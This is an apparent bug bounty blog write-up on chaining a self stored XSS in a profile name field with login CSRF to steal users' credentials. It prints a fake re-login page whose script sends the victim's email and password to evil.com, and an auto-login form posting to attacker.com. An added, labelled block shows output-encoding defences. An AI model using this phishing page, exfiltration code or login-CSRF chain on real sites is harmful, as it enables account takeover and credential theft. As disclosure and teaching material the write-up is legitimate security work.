Self XSS To Evil XSS

Saad Ahmed
Jun 20, 2019 · 3 min read

Hi guys, I hope you are all doing well. This POC is about how I converted a self XSS into an exploitable ("evil") XSS. Let's assume the site is PRIVATE.COM.

The first step was simply to sign up, log in, and start playing with the change-account-details functionality. After some time I found that the first name field was vulnerable to XSS, but the problem was that this is a self stored XSS, so I needed a way to use it against other users. The first method I checked was CSRF, but the account update request carries a CSRF token, so that method failed. Then I remembered the GEEK BOY POC.
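The root cause on the site is that the stored first name is written back into the page without encoding. The block below is an added example (my code, not from the original post or from PRIVATE.COM) of the contextual output encoding that makes the field inert in both the text and attribute positions where a profile page would print it. `escapeHtml`, `renderProfile`, the tag-count check and the sample payloads are hypothetical and constructed here; `attacker.example` is a placeholder host.

```javascript
// Added example, not code from the original post: output encoding for a stored
// profile field such as the vulnerable "first name". All names are hypothetical.

// Escape the five characters that can change meaning in HTML text or quoted
// attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened rendering: every user-controlled value passes through escapeHtml()
// at the exact point it enters the markup (once for text, once for an attribute).
function renderProfile(user) {
  return `<div class="profile">` +
    `<span class="first-name">${escapeHtml(user.firstName)}</span>` +
    `<input name="firstName" value="${escapeHtml(user.firstName)}">` +
    `</div>`;
}

// The vulnerable form of the same template, kept only for comparison: the stored
// value is interpolated raw, so a stored <iframe> becomes a real element.
function renderProfileUnsafe(user) {
  return `<div class="profile">` +
    `<span class="first-name">${user.firstName}</span>` +
    `<input name="firstName" value="${user.firstName}">` +
    `</div>`;
}

// Count tag-like tokens in rendered markup. The template itself contributes
// exactly TEMPLATE_TAG_COUNT tags; anything beyond that came from user data.
const TEMPLATE_TAG_COUNT = 5; // <div>, <span>, </span>, <input>, </div>
function countTags(rendered) {
  return (rendered.match(/<[a-zA-Z/][^>]*>/g) || []).length;
}

// True when the stored value could not add or break out of any element.
function isSafelyRendered(firstName) {
  return countTags(renderProfile({ firstName })) === TEMPLATE_TAG_COUNT;
}

// Constructed sample payloads of the two shapes that matter for this field:
// an element injected into text, and an attribute breakout.
const IFRAME_PAYLOAD = '<iframe src="https://attacker.example/phish.html"></iframe>';
const ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(1)';

const safeHtml = renderProfile({ firstName: IFRAME_PAYLOAD });
const unsafeHtml = renderProfileUnsafe({ firstName: IFRAME_PAYLOAD });
```

Encoding at output time is what fixes the bug; an additional `Content-Security-Policy` with `frame-src 'self'` would also stop the site's own pages from framing a third-party host, which is the delivery step the post relies on.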

So I simply created the HTML + JS code below to steal the victim's email and password.

<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body>

<center><div class="panel-body">
<h3>Something Went Wrong Please Login Again</h3>

<div class="login-group">
<label for="Vemail" class="control-label">Email</label>
<input id="Vemail" class="input span12" name="email" required="" type="email" value="" autofocus="">
</div>

<div class="login-group">
<label for="Vpass" class="control-label">Password</label>
<input id="Vpass" class="input span12" name="password" required="" type="password" value="">
<div class="alert alert-error error hide" id="error_missingPassword">Please enter your password</div>
</div>

<button class="action-button btn btn-primary login-button" buttontype="login" type="submit" onclick="myFunction()">Login</button>

</div></center>


<script>
function myFunction() {
var x = document.getElementById("Vemail").value;
var y = document.getElementById("Vpass").value;
var pwd = x + ":" + y;
alert(pwd);
window.location = "https://evil.com/" + pwd;
}
</script>



</body>
</html>

This is a simple HTML page with two input fields asking for email and password and one button; the JS code simply reads the input values and sends them to the attacker's server. I uploaded the code to a web host.


Then I simply used an iframe to load the code from the web host.


This is how it looks.


Everything is good; now all I need is to send the user this form.

<html>
<body>
<form action="https://attacker.com/login/submit" method="POST">
<input type="hidden" name="email" value="email@gmail.com" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

This simply makes the victim log in to my account without knowing it. Once logged in to my account, he sees the "Something Went Wrong" message with the input fields and tries to log in; when he does, the JS code takes the email and password the victim entered and sends them to the attacker's server.


I hope you like it :)

./Logout
